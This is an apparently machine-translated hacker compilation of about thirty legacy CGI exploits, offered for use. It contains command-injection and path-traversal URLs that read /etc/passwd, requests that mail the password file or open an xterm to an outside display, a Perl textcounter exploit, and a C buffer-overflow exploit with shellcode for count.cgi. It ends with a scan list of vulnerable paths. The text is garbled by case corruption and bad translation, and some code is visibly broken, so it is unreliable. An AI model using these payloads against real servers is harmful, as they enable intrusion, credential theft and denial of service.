CGI Vulnerability Collection _ Web surfing

I. PHF Vulnerability


This PHF loophole seems to be the most classic, almost all articles will be introduced, you can execute the server commands, such as display


/ETC/PASSWD:


Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/PHF?QALIAS=X%0A/BIN/CAT%20/ETC/PASSWD


But can we still find it?


Two. php.cgi 2.0beta10 or earlier version of the vulnerability


All files that can read nobody permissions.


Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/PHP.CGI?/ETC/PASSWD


PHP.CGI version 2.1 can only read shtml files. For the password file, comrades should be aware that perhaps in


/etc/master.passwd


/ETC/SECURITY/PASSWD and so on.


Three. whois_raw.cgi


Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/WHOIS_RAW.CGI?FQDN=%0ACAT%20/ETC/PASSWD


Lynx Http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xter


m%20-display%20graziella.lame.org:0


Four. Faxsurvey


Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/FAXSURVEY?/BIN/CAT%20/ETC/PASSWD


Five. textcounter.pl


If there is a textcounter.pl on the server, everyone can execute commands with the privileges of the HTTP daemon.


#!/usr/bin/perl


$URL = ' http://dtp.kappa.ro/a/test.shtml '; # please _do_ _modify_ this


$EMAIL = ' pdoru@pop3.kappa.ro,root '; # please _do_ _modify_ this


if ($ARGV [0]) {$CMD = $ARGV [0];} else{


$CMD = "(PS ax;cd ...; CD ... CD ... CD Etc;cat hosts;set) \|mail ${email}-sanothe


Re_one ";


} $text = "${url}/;ifs=\8;${cmd};echo|"; $text =~ s//\$\{ifs\}/g; #print "$text \


n ";


System ({"wget"} "wget", $text, "-o/dev/null");


System ({"wget"} "wget", $text, "-o/dev/null");


#system ({"Lynx"} "Lynx", $text); #如果没有wget命令也可以用lynx


#system ({"Lynx"} "Lynx", $text);


Six. Info2www vulnerabilities in some versions (1.1)


$ request_method=get./info2www ' (.. /.. /.. /.. /.. /.. /.. /bin/mail Jami asswd|) '


$


You have new mail.


$


I don't quite understand it,:(.


Seven. pfdispaly.cgi


Lynx-source \


' HTTP://WWW.VICTIM.COM/CGI-BIN/PFDISPALY.CGI?/../../../../ETC/MOTD '


Pfdisplay.cgi there's another loophole to execute the command.


Lynx-dump http://www.victim.com/cgi-bin/pfdispaly.cgi? '%0 A/bin/uname%20-a| '

Or


Lynx-dump \


Http://victim/cgi-bin/pfdispaly.cgi? '%0 A/usr/bin/x11/xclock%20-display%20evi


L:0.0| '


Eight. Wrap


Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/WRAP?/../../../../../ETC


Nine. Www-sql


Can let you read some restricted pages such as:


Enter in your browser: http://your.server/protected/something.html:


be required to enter account number and password. And there's no need for Www-sql:


Http://your.server/cgi-bin/www-sql/protected/something.html:


10. View-source


Lynx Http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/pass


Wd


11. Campas


Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/CAMPAS?%0ACAT%0A/ETC/PASSWD%0A


12. Webgais


Telnet www.victim.com 80


Post/cgi-bin/webgais http/1.0


CONTENT-LENGTH:85 (replace this and the actual length of the "exploit" line


)


Query= '; mail+drazvan\ @pop3. kappa.roparagraph


13. Websendmail


Telnet www.victim.com 80


Post/cgi-bin/websendmail http/1.0


Content-length:xxx (should is replaced with the actual length of the


String passed to the server, in this case xxx=90)


Receiver=;mail+your_address\ @somewhere. Orgubject=a&content=a


14. Handler


Telnet www.victim.com 80


Get/cgi-bin/handler/useless_shit;cat/etc/passwd|? data=downloadhttp/1.0


Or


Get/cgi-bin/handler/blah;xwsh-display Yourhost.com|?data=download


Or


get/cgi-bin/handler/;xterm-displaydanish:0-e/bin/s


H|? Data=download


Note that after the cat is the TAB key instead of the space, the server reports that Useless_shit cannot be opened, but still executes the following life


Make.


15. test-cgi


Lynx Http://www.victim.com/cgi-bin/test-cgi?\whatever


cgi/1.0 test Script:


ARGC is 0. ARGV is.


Server_software = ncsa/1.4b


server_name = victim.com


Gateway_interface = cgi/1.1


Server_protocol = http/1.0


Server_port = 80


Request_method = Get


Http_accept = Text/plain, application/x-html, application/html,


Text/html, text/x-html


Path_info =


path_translated =


Script_name =/cgi-bin/test-cgi


Query_string = whatever


Remote_host = fifth.column.gov


REMOTE_ADDR = 200.200.200.200


Remote_user =


Auth_type =


Content_Type =


Content_length =


Get some HTTP directories


Lynx HTTP://WWW.VICTIM.COM/CGI-BIN/TEST-CGI?\HELP&0A/BIN/CAT%20/ETC/PASSWD


The trick doesn't seem to work.:(


Lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*


You can also try this.


get/cgi-bin/test-cgi?* http/1.0


Get/cgi-bin/test-cgi?x *


get/cgi-bin/nph-test-cgi?* http/1.0


Get/cgi-bin/nph-test-cgi?x *


Get/cgi-bin/test-cgi?x http/1.0 *


Get/cgi-bin/nph-test-cgi?x http/1.0 *


16. For some BSD Apache you can:


Lynx HTTP://WWW.VICTIM.COM/ROOT/ETC/PASSWD


Lynx HTTP://WWW.VICTIM.COM/~ROOT/ETC/PASSWD


17. Htmlscript


Lynx Http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd


18. jj.c


The demo CGI program JJ.C calls/bin/mail without filtering user


Input, so no program based on JJ.C could potentially is exploited by


Simply adding a followed by a Unix command. It may require a


Password, but two known passwords include Httpdrocks and sdgrocks. If


Can retrieve a copy of the compiled program running strings on it


Would probably reveil the password.


Do a web search in jj.c to get a copy and study the code yourself if


You are have more questions.


Nineteen. Frontpage Extensions


If you read http://www.victim.com/_vti_inf.html, you'll get the FP extensions version.


And the path it has on the server. There are also some password files such as:


Http://www.victim.com/_vti_pvt/service.pwd


Http://www.victim.com/_vti_pvt/users.pwd


Http://www.victim.com/_vti_pvt/authors.pwd


Http://www.victim.com/_vti_pvt/administrators.pwd


Twenty. Freestats.com CGI


Never met, feel some places can not be mistaken, so directly affixed to English.


John Carlton found following. He developed a exploit for the


Free web Stats services offered at Freestats.com, and supplied the


Webmaster with proper code to patch the bug.


Start a account with freestats.com, and log in. Click on the


Area so says "Click here to EDIT YOUR USER profile & COUNTER


INFO "This'll call up a file called edit.pl with your user #


and password included in it. Save this file to your hard disk and


Open it with Notepad. The only form


Hidden attribute on the form element of your account number.


Change this from


*input Type=hidden Name=account value=your#*


To


*input type=text name=account value= "" *


Save your page and load it into your browser. Their would now be a


Text input box where the hidden element was before. Simply Type A


# in and push the ' Click here to update ' user profile ' and all '


Information that appears on your screens has now been written to


That's user profile.


But that isn ' t the worst of it. By using frames (2 frames, one to


Hold this page to just made, and one as a target for the form


Submission) You could change the password to all of their accounts


With a simple JavaScript function.


Deep inside the Web site authors still have the good old "edit.pl"


Script. It takes some time to reach it (unlike the path described)


But can reach it directly at:


http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=


21st. Vulnerability in Glimpse HTTP


Telnet target.machine.com 80


get/cgi-bin/aglimpse/80| ifs=5; Cmd=5mail5fyodor\ @dhp. Com\md;echo


http/1.0


22. count.cgi


This program is only valid for the following versions of COUNT.CGI 24:


/*### count.c ########################################################*/


#include


#include


#include


#include


#include


#include


#include


#include


#include


* Forwards * *


unsigned long getsp (int);


int usage (char *);


void doit (char *,long, char *);


* Constants * *


Char shell[]=


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"


"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"


"\X04\X8D\X56\X31\X89\X56\X08\X8D\X56\X3A\X89\X56\X0C\X8D\X56\X10"


"\X89\X46\X10\XB0\X0B\XCD\X80\X31\XDB\X89\XD8\X40\XCD\X80\XE8\XBF"


"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"


"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"


"/usr/x11r6/bin/xterm0-ut0-display0";


Char endpad[]=


"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"


"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";


int main (int argc, char *argv[]) {


char *shellcode = NULL;


int Cnt,ver,retcount, Dispnum,dotquads[4],offset;


unsigned long SP;


Char dispname[255];


Char *host;


offset = SP = CNT = ver = 0;


fprintf (stderr, "\t%s-gus\n", argv[0]);


if (argc<3) usage (argv[0]);


while (cnt = getopt (ARGC,ARGV, "H:d:v:o:")!= EOF) {


Switch (CNT) {


Case ' H ':


host = Optarg;


Break


Case ' d ':


{


Retcount = sscanf (Optarg, "%d.%d.%d.%d:%d",


&dotquads[0],


&DOTQUADS[1],


&DOTQUADS[2],


&DOTQUADS[3], &dispnum);


if (Retcount!= 5) Usage (argv[0));


sprintf (Dispname, "%03d.%0 3d.%0 3d.%0 3d:%01d ",


Dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);


Shellcode=malloc (strlen (char *) optarg) +strlen (shell) +strlen (Endpad));


sprintf (Shellcode, "%s%s%s", Shell,dispname,endpad);


}


Break


Case ' V ':


ver = atoi (optarg);


Break


Case ' O ':


offset = atoi (OPTARG);


Break


Default


Usage (argv[0]);


Break


}


}


SP = offset + GETSP (ver);


(void) doit (host,sp,shellcode);


Exit (0);


}


unsigned long getsp (int ver) {


/* Get the stack pointer we should to be using. YMMV. If It does not work,


Try Using-o x, where x is between-1500 and 1500 * *


unsigned long sp=0;


if (ver = =) sp = 0xbfffea50;


if (ver = =) sp = 0xbfffea50;


if (ver = =) sp = 0XBFFFEAB4;


if (ver = =) sp = 0xbfffee38; * Dunno about this one *


if (sp = 0) {


fprintf (stderr, "I don ' t have an SP for" version try using the-o option.)


\ n ");


fprintf (stderr, "versions above are patched for this bug.\n");


Exit (1);


} else {


return SP;


}


}


int usage (char *name) {


fprintf (stderr, "\tusage:%s-h host-d-v [-O]\n


", name);


fprintf (stderr, "\te.g.%s-h www.foo.bar-d 127.0.0.1:0-v 22\n", name);


Exit (1);


}


int Openhost (char *host, int port) {


int sock;


struct Hostent *he;


struct sockaddr_in sa;


he = gethostbyname (host);


if (he = NULL) {


Perror ("Bad hostname\n");


Exit (-1);


}


memcpy (&sa.sin_addr, he->h_addr, he->h_length);


Sa.sin_port=htons (port);


Sa.sin_family=af_inet;


Sock=socket (af_inet,sock_stream,0);


if (Sock < 0) {


Perror ("Cannot open socket");


Exit (-1);


}


Bzero (&sa.sin_zero,sizeof (Sa.sin_zero));


if (Connect (sock, (struct sockaddr *) &sa,sizeof sa) <0) {


Perror ("Cannot connect to host");


Exit (-1);


}


return (sock);


}


void doit (char *host,long sp, char *shellcode) {


int cnt,sock;


Char qs[7000];


int bufsize = 16;


Char Buf[bufsize];


Char chain[] = "User=a";


Bzero (BUF);


for (cnt=0;cnt<4104;cnt+=4) {


QS[CNT+0] = sp & 0x000000ff;


Qs[cnt+1] = (sp & 0x0000ff00) >> 8;


QS[CNT+2] = (sp & 0x00ff0000) >> 16;


QS[CNT+3] = (sp & 0xff000000) >> 24;


}


strcpy (Qs,chain);


Qs[strlen (chain)]=0x90;


qs[4104]= sp&0x000000ff;


qs[4105]= (SP&0X0000FF00) >>8;


qs[4106]= (sp&0x00ff0000) >>16;


qs[4107]= (sp&0xff000000) >>24;


qs[4108]= sp&0x000000ff;


qs[4109]= (SP&0X0000FF00) >>8;


qs[4110]= (sp&0x00ff0000) >>16;


qs[4111]= (sp&0xff000000) >>24;


qs[4112]= sp&0x000000ff;


qs[4113]= (SP&0X0000FF00) >>8;


qs[4114]= (sp&0x00ff0000) >>16;


qs[4115]= (sp&0xff000000) >>24;


qs[4116]= sp&0x000000ff;


qs[4117]= (SP&0X0000FF00) >>8;


qs[4118]= (sp&0x00ff0000) >>16;


qs[4119]= (sp&0xff000000) >>24;


qs[4120]= sp&0x000000ff;


qs[4121]= (SP&0X0000FF00) >>8;


qs[4122]= (sp&0x00ff0000) >>16;


qs[4123]= (sp&0xff000000) >>24;


qs[4124]= sp&0x000000ff;


qs[4125]= (SP&0X0000FF00) >>8;


qs[4126]= (sp&0x00ff0000) >>16;


qs[4127]= (sp&0xff000000) >>24;


qs[4128]= sp&0x000000ff;


qs[4129]= (SP&0X0000FF00) >>8;


qs[4130]= (sp&0x00ff0000) >>16;


qs[4131]= (sp&0xff000000) >>24;


strcpy ((char*) &qs[4132],shellcode);


Sock = Openhost (host,80);


Write (sock, "get/cgi-bin/count.cgi", 23);


Write (Sock,qs,strlen (QS));


Write (sock, "http/1.0\n", 10);


Write (sock, "User-agent:", 12);


Write (Sock,qs,strlen (QS));


Write (sock, "\ n", 2);


Sleep (1);


/* printf ("get/cgi-bin/count.cgi?%s http/1.0\nuser-agent:%s\n\n", Qs,qs); *


/


/*


Setenv ("Http_user_agent", qs,1);


Setenv ("Query_string", qs,1);


System ("./count.cgi");


*/


}


Look at pictures with count.cgi


Http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=.. /.. /.. /.. /.


./.. /path_to_gif/file.gif


23. finger.cgi


Lynx Http://www.victim.com/cgi-bin/finger? @localhost


Get the username that landed on the host.


24. man.sh


Robert Moniot found Followung. The May 1998 issue of the SysAdmin


Magazine contains an article, "Web-enabled Mans Pages", which


Includes source code for very nice CGI script named man.sh to feed


Mans pages to a Web browser. The hypertext links to other Mans


Pages are an especially attractive feature.


Unfortunately, this script are vulnerable to attack. Essentially,


Anyone who can execute the CGI thru their Web browser can run any


System commands with the user ID of the Web server and obtain the


Output from them in a Web page.


25. formhandler.cgi


Add it to the table.

There's/etc/passwd in your mailbox.


26. Jfs


I believe that everyone has read the "JFS intrusion Pcweek-linux Mainframe Detailed process" This article, he used Photoads


This CGI module hacked into the mainframe. I did not actually attack, read the article understanding is this


First Lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31


337&action=done&country=lala&city=lele&state=a&email=lala@hjere.com&name=%0a


1111111111111111111111111111111111111111111111111111111111111111111111111111


11111111111111111111111111111111111111111111 1111111111111111111111111111111


1111111111111111111111111111111111111111111111111111111111111111111111111111


111111111111111 111111111111111111111111111111111111111111111111111111111111


11111111111111111111111111111111111111111111111111111111111111 1111111111111


1111111111111111111111111111111111111111111111111111111111111111111111111111


111111111111111111111111111111111 111111111111111111111111111111111111111111


1111111111111111111111111111111111111111111111111111111111111111111111111111


1111 11111111111111111111111111111111111111111111111111111111111111111111111


111111111111111111111111111111111111111111111111111 111111111111111111111111


1111111111111111111111111111111111111111111111111111111111111111111111111111


1111111111111111111111 11111111111111111111111111111111111111111111111111111


111111111111111111111111111111111111111111111111111111111111111111111 111111


1111111111111111111111111111111111111111111111111111111111111111111111111111


1111111111111111111111111111111111111111 111111111111111111111111111&phone=1


1&subject=la&password=0&citystphone=0&renewed=0 "


Create a new ad value to bypass the $AdNum after checking


Lynx ' http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jp


g&adnum=11111111111111111111111111111111111111111111111111111111111111111111


111111111111111111111111111111111111111111111111111111 111111111111111111111


1111111111111111111111111111111111111111111111111111111111111111111111111111


1111111111111111111111111 11111111111111111111111111111111111111111111111111


111111111111111111111111111111111111111111111111111111111111111111111111 111


1111111111111111111111111111111111111111111111111111111111111111111111111111


1111111111111111111111111111111111111111111 11111111111111111111111111111111


1111111111111111111111111111111111111111111111111111111111111111111111111111


11111111111111 1111111111111111111111111111111111111111111111111111111111111


1111111111111111111111111111111111111111111111111111111111111 11111111111111


1111111111111111111111111111111111111111111111111111111111111111111111111111


11111111111111111111111111111111 1111111111111111111111111111111111111111111


1111111111111111111111111111111111111111111111111111111111111111111111111111


1111111111111111111111111111111111111111111111&datafile=1&password=0&fil


E_content=%00%00%00%00%00%00%00%00%00%00%00%00%00&file_name=/lala/\.. /.. /.. /


.. /.. /.. /.. /home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif '


Create/overwrite any files that the user nobody has permission to write.


I do not know whether the right, in its zip bag I can not find the To_url script, I do not know which comrades know?


27. Backdoor


See now some cgichk.c have checked Trojan unlg1.1 and rwwwshell.pl


The former one is written by UNLG, I have not seen the source code, there is a THC written, Packetstorm has its 1.6 version of the source code.


28. Visadmin.exe


Http://omni.server/cgi-bin/visadmin.exe?user=guest


This command is going to keep writing to the server's hard drive until it is full.


29. Campas


> Telnet www.xxxx.net 80


Trying 200.xx.xx.xx ...


Connected to Venus.xxxx.net


Escape character is ' ^] '.


get/cgi-bin/campas?%0 acat%0a/etc/passwd%0a


Root:x:0:1:super-user:/export/home/root:/sbin/sh


daemon:x:1:1::/:


Bin:x:2:2::/usr/bin:


sys:x:3:3::/:


Adm:x:4:4:admin:/var/adm:


Lp:x:71:8:line Printer ADMIN:/USR/SPOOL/LP:


Smtp:x:0:0:mail Daemon User:/:/bin/false


.... Now you know what to do:P


30. Webgais


Query= '; mail+foo@somewhere.nettelnet target.machine.com 80


Post/cgi-bin/webgais http/1.0


CONTENT-LENGTH:85 (replace this with the actual length of the "exploit"


Line


Query= '; mail+drazvan\ @pop3. kappa.roparagraph


Telnet target.machine.com 80


Post/cgi-bin/websendmail http/1.0


Content-length:xxx (should is replaced with the actual length of the


String passed to the server, in this case xxx=90)


Receiver=;mail+your_address\ @somewhere. Orgubject=a


&content=a


31. Wrap


Http://sgi.victim/cgi-bin/wrap?/../../../../../etc


List the files in the ETC directory


Here are the names of all the CGI programs that may contain vulnerabilities, as for other more vulnerabilities that are being collected and collated here


The hope of the heart get your criticism and advice.


/cgi-bin/rwwwshell.pl


/cgi-bin/phf


/cgi-bin/count.cgi


/cgi-bin/test.cgi


/cgi-bin/nph-test-cgi


/cgi-bin/nph-publish


/cgi-bin/php.cgi


/cgi-bin/handler


/cgi-bin/webgais


/cgi-bin/websendmail


/cgi-bin/webdist.cgi


/cgi-bin/faxsurvey


/cgi-bin/htmlscript/cgi-bin/pfdisplay.cgi


/cgi-bin/perl.exe


/cgi-bin/wwwboard.pl


/cgi-bin/www-sql


/cgi-bin/view-source


/cgi-bin/campas


/cgi-bin/aglimpse


/cgi-bin/glimpse


/cgi-bin/man.sh


/cgi-bin/at-admin.cgi


/scripts/no-such-file.pl


/_vti_bin/shtml.dll


/_vti_inf.html


/_vti_pvt/administrators.pwd


/_vti_pvt/users.pwd


/msadc/samples/selector/showcode.asp


/scripts/iisadmin/ism.dll?http/dir


/adsamples/config/site.csc


/main.asp%81


/advworks/equipment/catalog_type.asp?


/cgi-bin/input.bat?| Dir.. \.. \ windows


/index.asp:: $DATA


/cgi-bin/visadmin.exe?user=guest


/? Pageservices


/ss.cfg


/cgi-bin/get32.exe|echo%20>c:\file.txt


/cgi-bin/cachemgr.cgi


/cgi-bin/pfdispaly.cgi?/.. /.. /.. /.. /etc/motd


/domcfg.nsf/today.nsf


/names.nsf


/catalog.nsf


/log.nsf


/domlog.nsf


/cgi-bin/at-generate.cgi


/secure/.wwwacl


/secure/.htaccess


/samples/search/webhits.exe


/scripts/srchadm/admin.idq


/cgi-bin/dumpenv.pl


Adminlogin? Rcpage=/sysadmin/index.stm/c:/program


/getdrvrs.exe


/test/test.cgi


/scripts/submit.cgi


/users/scripts/submit.cgi


/ncl_items.html? subject=2097/cgi-bin/filemail.pl/cgi-bin/maillist.pl/cgi


-bin/jj


/cgi-bin/info2www


/cgi-bin/files.pl


/cgi-bin/finger


/cgi-bin/bnbform.cgi


/cgi-bin/survey.cgi


/cgi-bin/anyform2


/cgi-bin/textcounter.pl


/cgi-bin/classifieds.cgi


/cgi-bin/environ.cgi


/cgi-bin/wrap


/cgi-bin/cgiwrap


/cgi-bin/guestbook.cgi


/cgi-bin/edit.pl


/cgi-bin/perlshop.cgi


/_vti_inf.html


/_vti_pvt/service.pwd


/_vti_pvt/users.pwd


/_vti_pvt/authors.pwd


/_vti_pvt/administrators.pwd


/cgi-win/uploader.exe


/.. /.. /config.sys


/iisadmpwd/achg.htr


/iisadmpwd/aexp.htr


/iisadmpwd/aexp2.htr


/iisadmpwd/aexp4b.htr


/iisadmpwd/aexp4b.htr


Cfdocs/expeval/exprcalc.cfm? Openfilepath=c:\winnt\repair\sam._


/cfdocs/expeval/openfile.cfm


/cfdocs/expeval/openfile.cfm


/getfile.cfm? Ft=text&fst=plain&filepath=c:\winnt\repair\sam._


/cfide/administrator/startstop.html


/cgi-bin/wwwboard.pl


/_vti_pvt/shtml.dll


/_vti_pvt/shtml.exe


/cgi-dos/args.bat


/cgi-win/uploader.exe


/cgi-bin/rguest.exe


/cgi-bin/wguest.exe


/scripts/issadmin/bdir.htr


/scripts/cgimail.exe


/scripts/tools/newdsn.exe


/scripts/fpcount.exe


/cfdocs/expelval/openfile.cfm


/cfdocs/expelval/exprcalc.cfm


/cfdocs/expelval/displayopenedfile.cfm


/cfdocs/expelval/sendmail.cfm


/iissamples/exair/howitworks/codebrws.asp


/iissamples/sdk/asp/docs/codebrws.asp


/msads/samples/selector/showcode.asp


/search97.vts


/carbo.dll


/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd


/doc


/.html/............./config.sys


/....../